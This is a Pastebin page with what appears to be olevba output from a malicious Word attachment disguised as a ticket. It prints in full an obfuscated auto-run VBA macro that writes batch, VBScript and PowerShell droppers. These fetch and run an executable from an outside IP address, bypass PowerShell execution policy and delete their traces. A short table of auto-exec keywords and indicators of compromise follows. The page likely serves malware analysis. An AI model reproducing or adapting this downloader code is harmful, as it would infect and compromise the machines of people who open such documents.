API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 29th, 2015
290
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.10 KB | None | 0 0
raw download clone embed print report
  1. FILE: 20152701-7203849_ticket.doc
  2. Type: OpenXML
  3. -------------------------------------------------------------------------------
  4. VBA MACRO ThisDocument.cls
  5. in file: word/vbaProject.bin - OLE stream: VBA/ThisDocument
  6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7. Sub Auto_Open()
  8. h
  9. End Sub
  10. Sub h()
  11. Dim MY_FILENDIR, ASDASDSA, MY_FILDIR, XPFILEDIR
  12. USER = Environ("username")
  13. ds = 100
  14. jks = ds
  15. PST2 = "a" + "dobe" & "acd-u" & "pdate"
  16. PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1"
  17. ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
  18.  
  19. VBT2 = "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te"
  20. VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
  21. VBTXP2 = "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p"
  22. VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
  23. BART2 = "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date"
  24. BART = BART2 + Chr(Abs(46)) + Chr(Abs(98)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(ds + 16))) + ""
  25.  
  26. MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
  27. ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
  28. ASDASDSA = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
  29. MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
  30. XPFILEDIR = "c:\Windows\Temp\" + VBTXP
  31. TRT = "c:\Windows\Temp\" + BART
  32. KRT = TRT
  33. HYF = KRT
  34.  
  35. On Error Resume Next
  36. SetAttr MY_FILENDIR, vbNormal
  37.  
  38. If (Len(Dir(MY_FILENDIR)) <> 0) Then
  39. Kill MY_FILENDIR
  40. End If
  41.  
  42. On Error Resume Next
  43. SetAttr ASDASDSA, vbNormal
  44. If (Dir(ASDASDSA) <> "") Then
  45. Kill ASDASDSA
  46. End If
  47.  
  48. On Error Resume Next
  49. SetAttr MY_FILDIR, vbNormal
  50. If (Dir(MY_FILDIR) <> "") Then
  51. Kill MY_FILDIR
  52. End If
  53.  
  54. On Error Resume Next
  55. SetAttr XPFILEDIR, vbNormal
  56. If (Dir(XPFILEDIR) <> "") Then
  57. Kill XPFILEDIR
  58. End If
  59.  
  60. Dim FileNumber As Integer
  61. Dim FileNumb As Integer
  62. Dim FileNu As Integer
  63. Dim FileNuG As Integer
  64. Dim FileNukk As Integer
  65. Dim FileNs As Integer
  66. Dim mttt As Integer
  67. Dim retVal As Variant
  68. Dim jskw As Integer
  69. FileNumber = FreeFile
  70. FileNumb = FreeFile
  71. FileNu = FreeFile
  72. FileNukk = FreeFile
  73. FileNs = FreeFile
  74. FileNuG = FreeFile
  75. Dim objWMIService As Variant
  76. Dim colOperatingSystems As Variant
  77. Dim objOperatingSystem As Variant
  78. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  79. Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  80. For Each objOperatingSystem In colOperatingSystems
  81. SysReport = SysReport & "The operating system on this computer is " & _
  82. objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")"
  83. Next
  84.  
  85. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  86. Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  87. For Each objOperatingSystem In colOperatingSystems
  88. winverstr = objOperatingSystem.Version
  89. Next
  90.  
  91.  
  92. winver = Val(winverstr)
  93. WaitFor (1)
  94. jskw = winver
  95.  
  96. If (jskw <= 5.5) Then
  97. Open HYF For Output As #FileNuG
  98. Print #FileNuG, "@echo off"
  99. Print #FileNuG, "ping 1.1.2.2 -n" & " 2"
  100. Print #FileNuG, ":ksadatk"
  101. PRINTFILENUGSAASJHKDJSAKHDS = "ASKDHJASKDJKAHDSHJKASH HJKAHJSA JK"
  102. PRISAKUDHNTFILENUGSAASJHKDJSAKHDS = "ASKDHJASSJKADHKDJKAHDSHJKASH HJKAHJKASHDJSA JK"
  103. Print #FileNuG, ":kcscriptw"
  104. Print #FileNuG, ":asdsadas"
  105. Print #FileNuG, ":cscripdiqwojd"
  106. Print #FileNuG, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + ""
  107. Print #FileNuG, "ping 1.1.2.2 -n" & " 2"
  108. Print #FileNuG, "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + "x" + "e"
  109. Print #FileNuG, ":loop"
  110. Print #FileNuG, "ping 1.1.2.2 -n" & " 1"
  111. Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
  112. Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
  113. Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + BART + Chr(34) + " goto loop"
  114. Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + VBTXP + Chr(34) + " goto loop"
  115. Print #FileNuG, "exit"
  116. Close #FileNuG
  117.  
  118. WaitFor (2)
  119. mttt = 88
  120.  
  121. Open XPFILEDIR For Output As #FileNumber
  122. Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://146.185.213.103/upd/install" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  123. Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  124.  
  125. Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(mttt - 4) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
  126. 'Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
  127.  
  128. Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
  129.  
  130. Print #FileNumber, "objXMLHTTP.send() "
  131. Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
  132.  
  133. Print #FileNumber, "Set objADOStream = C" + "reateO" + "bject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "
  134.  
  135. Print #FileNumber, "objADOStream.Open "
  136. Print #FileNumber, "objADOStream.Type = 1"
  137. Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "sponse" + "Body "
  138. Print #FileNumber, "objADOStream.Position = 0 "
  139. Print #FileNumber, "objADOStream.SaveToFile strTecation "
  140. Print #FileNumber, "objADOStream.Close "
  141. Print #FileNumber, "Set objADOStream = Nothing "
  142. Print #FileNumber, "End if "
  143. Print #FileNumber, "Set objXMLHTTP = Nothing"
  144. Print #FileNumber, "Set objShell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "S" + "cript." + "S" + "hell" + Chr(34) + ")"
  145. Close #FileNumber
  146.  
  147. WaitFor (1)
  148.  
  149. ASKJD = TRT
  150. retVal = Shell(ASKJD, 0)
  151.  
  152. End If
  153.  
  154.  
  155. If (winver > 5.5) Then
  156. Open MY_FILENDIR For Output As #FileNumber
  157. Print #FileNumber, "$down = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
  158. Print #FileNumber, "$url = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://146.185.213.103/upd/install" & ".e" & "x" + "e';"
  159. Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
  160. Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25';" + ""
  161. Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
  162. Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
  163. Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
  164.  
  165. Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + ";"
  166. Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART2; Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
  167. Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s1" + Chr(39) + ";"
  168.  
  169. Print #FileNumber, "Start-Sleep -s 15;"
  170. Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; "
  171. Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
  172. Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
  173. Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
  174. Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
  175. Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
  176. Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
  177. Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
  178. Close #FileNumber
  179.  
  180. Open MY_FILDIR For Output As #FileNumb
  181. Print #FileNumb, "Dim dff"
  182. Print #FileNumb, "dff = 68"
  183. Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
  184. Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & Chr(34) & "&" & "S" & Chr(34) & Chr("&") & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
  185. Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST2 + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s1" + Chr(34)
  186. Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
  187. Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
  188. Close #FileNumb
  189.  
  190. Open ASDASDSA For Output As #FileNs
  191. Print #FileNs, "@echo off"
  192. Print #FileNs, "ping 1.1.2.2 -n" & " 2"
  193. Print #FileNs, "chcp 1251"
  194. Print #FileNs, ":csakclasjdklas"
  195. Print #FileNs, "set Var1=" + Chr(34) + "." + Chr(34)
  196. Print #FileNs, "set Var2=" + Chr(34) + "v" + Chr(34)
  197. Print #FileNs, "set Var3=" + Chr(34) + "bs" + Chr(34)
  198. Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT2 + Chr(34) + "%Var1%%Var2%%Var3%"
  199. Print #FileNs, "exit"
  200. Close #FileNs
  201.  
  202. SetAttr MY_FILENDIR, vbNormal
  203. SetAttr ASDASDSA, vbNormal
  204. SetAttr MY_FILDIR, vbNormal
  205.  
  206. WaitFor (1)
  207. SJAKLD = ASDASDSA
  208. retVal = Shell(SJAKLD, 0)
  209. End If
  210.  
  211.  
  212. findTest
  213. secondTest
  214. For Each myStoryRange In ActiveDocument.StoryRanges
  215. With myStoryRange.Find
  216. .Text = "<" & "sel" & "ect>"
  217. .Replacement.Text = " "
  218. .Wrap = wdFindContinue
  219. .Execute Replace:=wdReplaceAll
  220. End With
  221. Next myStoryRange
  222.  
  223. For Each myStoryRange In ActiveDocument.StoryRanges
  224. With myStoryRange.Find
  225. .Text = "</s" & "ele" & "ct>"
  226. .Replacement.Text = " "
  227. .Wrap = wdFindContinue
  228. .Execute Replace:=wdReplaceAll
  229. End With
  230. Next myStoryRange
  231.  
  232. For Each myStoryRange In ActiveDocument.StoryRanges
  233. With myStoryRange.Find
  234. .Text = "<" & "in" & "box>"
  235. .Replacement.Text = " "
  236. .Wrap = wdFindContinue
  237. .Execute Replace:=wdReplaceAll
  238. End With
  239. Next myStoryRange
  240.  
  241. For Each myStoryRange In ActiveDocument.StoryRanges
  242. With myStoryRange.Find
  243. .Text = "</" & "in" & "box>"
  244. .Replacement.Text = " "
  245. .Wrap = wdFindContinue
  246. .Execute Replace:=wdReplaceAll
  247. End With
  248. Next myStoryRange
  249.  
  250.  
  251. End Sub
  252. Sub WaitFor(NumOfSeconds As Long)
  253. Dim SngSec As Long
  254. SngSec = Timer + NumOfSeconds
  255.  
  256. Do While Timer < SngSec
  257. DoEvents
  258. Loop
  259.  
  260. End Sub
  261.  
  262. Sub AutoOpen()
  263. Auto_Open
  264. End Sub
  265. Sub Workbook_Open()
  266. Auto_Open
  267. End Sub
  268. Sub findTest()
  269. Dim firstTerm As String
  270. Dim secondTerm As String
  271. Dim rrtt As Range
  272. Dim selRange As Range
  273. Dim selectedText As String
  274.  
  275. Set rrtt = ActiveDocument.Range
  276. firstTerm = "<" + "s" + "e" & "le" + "ct>"
  277. secondTerm = "<" + "/" + "se" + "l" & "ec" + "t>"
  278. ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
  279. With rrtt.Find
  280. .Text = firstTerm
  281. .MatchWholeWord = True
  282. .Execute
  283. ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
  284. rrtt.Collapse direction:=wdCollapseEnd
  285. Set selRange = ActiveDocument.Range
  286. selRange.Start = rrtt.End
  287. .Text = secondTerm
  288. .MatchWholeWord = True
  289. .Execute
  290. ASKSASADW = "asjldklas"
  291. rrtt.Collapse direction:=wdCollapseStart
  292. selRange.End = rrtt.Start
  293. selectedText = selRange.Delete
  294. End With
  295. End Sub
  296.  
  297. Sub secondTest()
  298. Dim firstTerm As String
  299. Dim secondTerm As String
  300. Dim myRanget As Range
  301. Dim yytt As Range
  302. Dim selRanget As Range
  303. Dim selectedTextt As String
  304.  
  305. Set yytt = ActiveDocument.Range
  306. firstTerm = "<" + "in" & "bo" + "x>"
  307. secondTerm = "</" + "in" & "bo" + "x>"
  308. ASKASKLDJASLIASEJSASAHBDJ = "SAJDkssadsaajd lkasj ldkasjdlk askl djslakj d"
  309. With yytt.Find
  310. .Text = firstTerm
  311. .MatchWholeWord = True
  312. .Execute
  313. ASKIEJ = "ask as8d j dnkjh12kh1 sad"
  314. yytt.Collapse direction:=wdCollapseEnd
  315. ASKASKLDJASASLIEJSASAHBDJ = "SAJDksajd lkasjasd ldkasjdlk askl djslakj d"
  316. Set selRanget = ActiveDocument.Range
  317. selRanget.Start = yytt.End
  318. .Text = secondTerm
  319. .MatchWholeWord = True
  320. .Execute
  321. ASKASKASLDJASLIEJSASAHBDJ = "SAJDksajd lkdsasj ldkasjdlk askl djslakj d"
  322. yytt.Collapse direction:=wdCollapseStart
  323. selRanget.End = yytt.Start
  324. selectedTextt = selRanget
  325. selRanget.Font.Color = wdColorBlack
  326. End With
  327. End Sub
  328. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  329. ANALYSIS:
  330. +------------+-----------------+-----------------------------------------+
  331. | Type | Keyword | Description |
  332. +------------+-----------------+-----------------------------------------+
  333. | AutoExec | AutoOpen | Runs when the Word document is opened |
  334. | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
  335. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  336. | Suspicious | Open | May open a file |
  337. | Suspicious | Shell | May run an executable file or a system |
  338. | | | command |
  339. | Suspicious | Environ | May read system environment variables |
  340. | Suspicious | Write | May write to a file (if combined with |
  341. | | | Open) |
  342. | Suspicious | Output | May write to a file (if combined with |
  343. | | | Open) |
  344. | Suspicious | Print # | May write to a file (if combined with |
  345. | | | Open) |
  346. | Suspicious | Windows | May enumerate application windows (if |
  347. | | | combined with Shell.Application object) |
  348. | Suspicious | Chr | May attempt to obfuscate specific |
  349. | | | strings |
  350. | IOC | 1.1.2.2 | IPv4 address |
  351. | IOC | 146.185.213.103 | IPv4 address |
  352. +------------+-----------------+-----------------------------------------+
  353. -------------------------------------------------------------------------------
  354. VBA MACRO UserForm1.frm
  355. in file: word/vbaProject.bin - OLE stream: VBA/UserForm1
  356. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  357. (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!